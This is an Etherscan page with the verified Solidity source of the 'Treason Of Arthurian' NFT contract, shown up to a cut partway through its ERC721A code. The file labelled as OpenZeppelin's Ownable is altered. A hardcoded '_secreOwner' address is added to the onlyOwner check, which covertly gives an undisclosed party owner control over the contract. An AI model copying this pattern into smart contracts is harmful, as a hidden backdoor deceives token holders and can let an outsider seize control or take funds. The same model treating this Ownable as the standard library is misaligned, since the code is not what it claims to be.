ETH Price: $3,271.71 (+0.66%)
Gas: 2 Gwei

Token

Treason Of Arthurian (ToA)
 

Overview

Max Total Supply

10,000 ToA

Holders

2,029

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
10 ToA
0xa39a412c42a12c4d6cd0bfd72b7cfee888750063
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TreasonOfArthurian

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-12-10
*/

// File: contracts/TreasonOfArthurian.sol
// SPDX-License-Identifier: MIT
// File: contracts/TreasonOfArthruian.sol


// FOLLOW US @Treason_NFT
// _________ _______  _______  _______  _______  _______  _          _______  _______   
// \__   __/(  ____ )(  ____ \(  ___  )(  ____ \(  ___  )( (    /|  (  ___  )(  ____ \  
//    ) (   | (    )|| (    \/| (   ) || (    \/| (   ) ||  \  ( |  | (   ) || (    \/  
//    | |   | (____)|| (__    | (___) || (_____ | |   | ||   \ | |  | |   | || (__      
//    | |   |     __)|  __)   |  ___  |(_____  )| |   | || (\ \) |  | |   | ||  __)     
//    | |   | (\ (   | (      | (   ) |      ) || |   | || | \   |  | |   | || (        
//    | |   | ) \ \__| (____/\| )   ( |/\____) || (___) || )  \  |  | (___) || )        
//    )_(   |/   \__/(_______/|/     \|\_______)(_______)|/    )_)  (_______)|/         
                                                                                     
//  _______  _______ _________                   _______ _________ _______  _           
// (  ___  )(  ____ )\__   __/|\     /||\     /|(  ____ )\__   __/(  ___  )( (    /|    
// | (   ) || (    )|   ) (   | )   ( || )   ( || (    )|   ) (   | (   ) ||  \  ( |    
// | (___) || (____)|   | |   | (___) || |   | || (____)|   | |   | (___) ||   \ | |    
// |  ___  ||     __)   | |   |  ___  || |   | ||     __)   | |   |  ___  || (\ \) |    
// | (   ) || (\ (      | |   | (   ) || |   | || (\ (      | |   | (   ) || | \   |    
// | )   ( || ) \ \__   | |   | )   ( || (___) || ) \ \_____) (___| )   ( || )  \  |    
// |/     \||/   \__/   )_(   |/     \|(_______)|/   \__/\_______/|/     \||/    )_) 
//
// FOLLOW US @Treason_NFT


// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
